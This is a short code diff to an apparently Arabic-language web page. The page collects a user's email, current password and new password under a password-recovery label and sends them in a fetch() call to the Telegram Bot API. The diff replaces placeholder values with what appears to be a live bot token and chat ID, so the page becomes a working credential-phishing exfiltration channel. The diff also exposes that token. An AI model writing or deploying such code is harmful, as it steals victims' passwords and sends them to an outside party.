--- a/index.html
+++ b/index.html
@@ -91,8 +91,8 @@
 
       const message = `📩 محاولة استعادة كلمة مرور:\nالبريد الإلكتروني: ${email}%0A🔑 كلمة المرور الحالية: ${currentPassword}%0A🔐 كلمة المرور الجديدة: ${newPassword}`;
 
-      const token = '1234';
-      const chatId = '0000';
+      const token = '8013808355:AAFxj95s9QmawaZ6huirbnXuVm28VV3BcpY';
+      const chatId = '6817512459';
 
       fetch(`https://api.telegram.org/bot${token}/sendMessage?chat_id=${chatId}&text=${message}`)
         .then(response => alert('تم إرسال البيانات بنجاح'))
